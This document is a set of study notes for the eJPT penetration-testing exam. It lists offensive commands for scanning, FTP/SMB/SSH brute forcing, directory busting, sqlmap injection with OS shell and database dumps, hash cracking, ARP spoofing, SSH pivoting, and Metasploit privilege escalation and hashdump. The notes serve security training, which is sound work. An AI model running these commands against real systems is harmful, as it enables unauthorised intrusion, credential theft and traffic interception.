Collection of notes to prepare for the eLearnSecurity eJPT certification exam.
fping -a -g {IP RANGE} 2>/dev/null
fping -a -g 10.10.10.0/8 2>/dev/null
nmap -sn 10.10.10.0/8 | grep -oP '(?<=Nmap scan report for )[^ ]*'
nmap -sC -sV 10.10.10.10
nmap -sC -sV -p- 10.10.10.10
nmap -sU -sV 10.10.10.10
nmap -sn 10.10.10.0/24 -oN hosts.nmap
Port | Protocol |
---|---|
21 | FTP |
22 | SSH |
23 | TELNET |
25 | SMTP |
53 | DNS |
80 | HTTP |
443 | HTTPS |
110 | POP3 |
115 | SFTP |
143 | IMAP |
135 | MSRPC |
137 | NETBIOS |
138 | NETBIOS |
139 | NETBIOS |
445 | SMB |
3306 | MYSQL |
1433 | MYSQL |
3389 | RDP |
nmap -sV --script=vulners -v 10.10.10.1
nmap --script vuln --script-args=unsafe=1 -iL hosts.nmap
nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip
nmap --script=ftp-* -p 21 10.10.10.1
ftp 10.10.10.1
ncftp 10.10.10.1
hydra -l $user -P /usr/share/john/password.lst ftp://10.10.10.1:21
hydra -l $user -P /usr/share/wordlistsnmap.lst -f 10.10.10.1 ftp -V
medusa -h 10.10.10.1 -u $user -P passwords.txt -M ftp
ftp-user-enum.pl -U users.txt -t 10.10.10.1
ftp-user-enum.pl -M iu -U users.txt -t $ip
• send # Send single file
• put # Send one file.
• mput # Send multiple files.
• mget # Get multiple files.
• get # Get file from the remote computer.
• ls # list
• mget * # Download everything
• binary = Switches to binary transfer mode.
• ascii = Switch to ASCII transfer mode
• ftpusers
• ftp.conf
• proftpd.conf
• ProFTPD-1.3.3c Backdoor
• ProFTPD 1.3.5 Mod_Copy Command Execution
• VSFTPD v2.3.4 Backdoor Command Execution
1. Gather version numbers
2. Check Searchsploit
3. Check for Default Creds
4. Use Creds previously gathered
5. Download the software
nmap -p 139,445 --open -oG smb.txt 192.168.1.0/24
nbtscan -r 192.168.1.0/24
nmblookup -A 10.10.10.1
smbmap -H 10.10.10.1
rpcclient -U "" -N 10.10.10.1
smbclient \\\\$ip\\ShareName
smbclient -L //10.10.10.3/ --option='client min protocol=NT1'
smbmap -H 10.10.1.1
echo exit | smbclient -L \\\\10.10.10.10
nmap --script smb-enum-shares -p 139,445 10.10.10.10
nmap --script smb-vuln* -p 139,445 10.10.10.10
• Windows NT, 2000, and XP (most SMB1) - VULNERABLE: Null Sessions can be created by default
• Windows 2003, and XP SP2 onwards - NOT VULNERABLE: Null Sessions can't be created default
• Most Samba (Unix) servers
• SMB1 – Windows 2000, XP and Windows 2003.
• SMB2 – Windows Vista SP1 and Windows 2008
• SMB2.1 – Windows 7 and Windows 2008 R2
• SMB3 – Windows 8 and Windows 2012.
1. Checkout the entire webpage and what it is displaying.
2. Read every page, look for emails, names, user info, etc.
3. Directory Discovery (time to dir bust!)
4. Enumerate the interface, what is the CMS & Version? Server installation page?
5. Check for potential Local File Inclusion, Remote File Inclusion, SQL Injection, XXE, and Upload vulnerabilities
6. Check for a default server page, identify the server version
7. View Source Code:
a. Check for hidden values
b. Check for comments/developer remarks
c. Check for Extraneous Code
d. Check for passwords
8. Check for robots.txt file
9. Web Scanning
gobuster dir -u 10.10.10.181 -w /usr/share/seclists/Discovery/Web-Content/common.txt
gobuster -u $ip -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/Top1000-RobotsDisallowed.txt; gobuster -u http://10.10.10.10. -w Top1000-RobotsDisallowed.txt
gobuster dir -u http://$ip -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -o gobuster-root -t 50
gobuster -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --sc 200 http://10.10.10.10/FUZZ
./erodir -u http://10.10.10.10 -e /usr/share/wordlists/dirb/common.txt -t 20
cd /root/dirsearch; python3 dirsearch.py -u http://10.10.10.10/ -e .php
for file in $(ls /usr/share/seclists/Discovery/Web-Content); do gobuster -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/$file -e -k -l -s "200,204,301,302,307" -t 20 ; done
sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar
sqlmap -u http://10.10.10.10 -p parameter
sqlmap -u http://10.10.10.10 --data POSTstring -p parameter
sqlmap -u http://10.10.10.10 --os-shell
sqlmap -u http://10.10.10.10 --dump
unshadow passwd shadow > unshadow
john -wordlist /path/to/wordlist -users=users.txt hashfile
ip route - prints the routing table for the host you are on
ip route add ROUTETO via ROUTEFROM - add a route to a new network if on a switched network and you need to pivot
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11
# local port forwarding
# the target host 192.168.0.100 is running a service on port 8888
# and you want that service available on the localhost port 7777
ssh -L 7777:localhost:8888 [email protected]
# remote port forwarding
# you are running a service on localhost port 9999
# and you want that service available on the target host 192.168.0.100 port 12340
ssh -R 12340:localhost:9999 [email protected]
# Local proxy through remote host
# You want to route network traffic through a remote host target.host
# so you create a local socks proxy on port 12001 and configure the SOCKS5 settings to localhost:12001
ssh -C2qTnN -D 12001 [email protected]
hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22
hydra -L users.txt -P pass.txt telnet://10.10.10.10
search x
use x
info
show options, show advanced options
SET X (e.g. set RHOST 10.10.10.10, set payload x)
background
sessions -l
sessions -i 1
sysinfo, ifconfig, route, getuid
getsystem (privesc)
bypassuac
download x /root/
upload x C:\\Windows
shell
use post/windows/gather/hashdump